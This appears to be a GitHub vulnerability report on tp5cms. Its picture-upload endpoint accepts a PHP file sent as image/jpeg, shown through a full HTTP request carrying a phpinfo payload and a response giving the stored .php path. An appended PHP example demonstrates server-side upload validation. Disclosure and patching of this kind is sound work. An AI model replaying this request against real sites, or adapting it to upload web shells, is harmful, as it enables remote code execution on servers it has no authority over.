tp5cms: the photo upload function can upload any type of document #5

Open
langyayue opened this issue Nov 29, 2018 · 0 comments

@langyayue

tp5cms: the photo upload function can upload any type of document (including PHP).
At the picture upload location, the image type is replaced with another type.
Payload:

POST /tp5cms-master/admin.php/upload/picture.html HTTP/1.1
Host: 192.168.43.15
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.43.15/tp5cms-master/admin.php/article/add.html
Content-Length: 792
Content-Type: multipart/form-data; boundary=---------------------------263561600032324
Cookie: PHPSESSID=bpgp1b6kfpl84tdk4lj4mj4q16
Connection: close

-----------------------------263561600032324
Content-Disposition: form-data; name="id"

WU_FILE_0
-----------------------------263561600032324
Content-Disposition: form-data; name="name"

QQ��20181127092936.php
-----------------------------263561600032324
Content-Disposition: form-data; name="type"

image/jpeg
-----------------------------263561600032324
Content-Disposition: form-data; name="lastModifiedDate"

Tue Nov 27 2018 09:29:40 GMT+0800
-----------------------------263561600032324
Content-Disposition: form-data; name="size"

13893
-----------------------------263561600032324
Content-Disposition: form-data; name="file"; filename="QQ��20181127092936.php"
Content-Type: image/jpeg

<?php phpinfo();
-----------------------------263561600032324--

Response:

HTTP/1.1 200 OK
Date: Thu, 29 Nov 2018 09:15:41 GMT
Server: Apache/2.4.23 (Win32) OpenSSL/1.0.2j PHP/5.4.45
X-Powered-By: PHP/5.4.45
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 120
Connection: close
Content-Type: application/json; charset=utf-8

{"path":"\/tp5cms-master\/uploads\/20181129\/712041c64a6f79b10120506a2610987d.php","code":1,"message":"�传���"}
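
One way to close the gap shown in the request and response above, where the stored file kept its `.php` extension although the part was declared `image/jpeg`. This is an added example, not code from the report or from tp5cms; the function and constant names are hypothetical, the sample inputs are constructed, and it assumes PHP 7.1+ with the `fileinfo` extension enabled.

```php
<?php
// Added example: server-side validation for an image upload endpoint.
// ALLOWED_IMAGE_TYPES and stored_name_for_upload() are hypothetical names.

const ALLOWED_IMAGE_TYPES = [
    'image/jpeg' => 'jpg',
    'image/png'  => 'png',
    'image/gif'  => 'gif',
];

/**
 * Decide the stored file name from the uploaded bytes and the client name.
 * Returns null when the upload must be rejected.
 */
function stored_name_for_upload(string $clientName, string $bytes): ?string
{
    // The client-sent Content-Type header and "type" form field are never consulted.
    $detected = (new finfo(FILEINFO_MIME_TYPE))->buffer($bytes);
    if ($detected === false || !array_key_exists($detected, ALLOWED_IMAGE_TYPES)) {
        return null;
    }
    // Reject names whose extension is not an image extension at all, e.g. ".php".
    $clientExt = strtolower(pathinfo($clientName, PATHINFO_EXTENSION));
    if (!in_array($clientExt, ['jpg', 'jpeg', 'png', 'gif'], true)) {
        return null;
    }
    // Random server-chosen name; the extension comes from the allowlist only.
    return bin2hex(random_bytes(16)) . '.' . ALLOWED_IMAGE_TYPES[$detected];
}

// Constructed sample inputs: a 1x1 GIF and the PHP body used in the report.
$gif = base64_decode('R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7');
$php = "<?php phpinfo();\n";
$cases = [
    ['shot.php', $php], // PHP body, PHP extension (the case in the report)
    ['shot.php', $gif], // image bytes, PHP extension
    ['shot.gif', $php], // PHP body, image extension
    ['shot.gif', $gif], // genuine image
];
foreach ($cases as [$name, $bytes]) {
    $stored = stored_name_for_upload($name, $bytes);
    printf("%-9s %3d bytes -> %s\n", $name, strlen($bytes), $stored ?? 'REJECTED');
}
```

Content sniffing alone does not prove a file is harmless, so the server-chosen extension matters as much as the type check. The upload directory should also be configured so that the web server never passes its files to the PHP interpreter.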